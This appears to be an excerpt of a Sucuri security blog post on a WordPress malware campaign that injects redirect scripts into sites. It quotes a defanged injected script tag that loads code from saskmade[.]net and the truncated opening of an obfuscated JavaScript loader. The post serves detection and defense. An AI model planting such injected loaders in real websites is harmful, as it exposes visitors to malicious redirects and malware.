Saskmade[.]net Redirects

less than 1 minute read

Saskmade[.]net Redirects<p>Earlier this week, we published a blog post about an ongoing massive malware campaign describing multiple infection vectors that it uses. This same week, we started detecting new modifications of the scripts injected by this attack.</p>

The general idea of the malware is the same, but the domain name and obfuscation has changed slightly.

For example, in the wp_post table they now inject this script:

<script src='hxxps://saskmade[.]net/head.js?ver=2.0.0' type='text/javascript'>

In the section of HTML and PHP files, and at the top of jQuery-related JavaScript files, they inject this new obfuscated script:

var _0x1e35=['length','fromCharCode','createElement','type','async','code121','src','appendChild','getElementsByTagName','script'];(function(_0x546a53,
...skipped...

Continue reading Saskmade[.]net Redirects at Sucuri Blog.

</img>

You may also enjoy

Spotlight on Women in Cybersecurity

less than 1 minute read

Sucuri is committed to helping women develop their careers in technology. On International Women’s Day, Sucuri team members share their insights into workin...

Hacked Website Trend Report – 2018

less than 1 minute read

We are proud to be releasing our latest Hacked Website Trend Report for 2018. This report is based on data collected and analyzed by the GoDaddy Security / ...

Facebook
Google plus
Pinterest
RSS
Spotlight on Women in Cybersecurity
How to Add SSL & Move WordPress from HTTP to HTTPS
Hacked Website Trend Report – 2018
Fake Browser Updates Push Ransomware and Bank Malware
Google Analytics and Angular in Magento Credit Card Stealing Scripts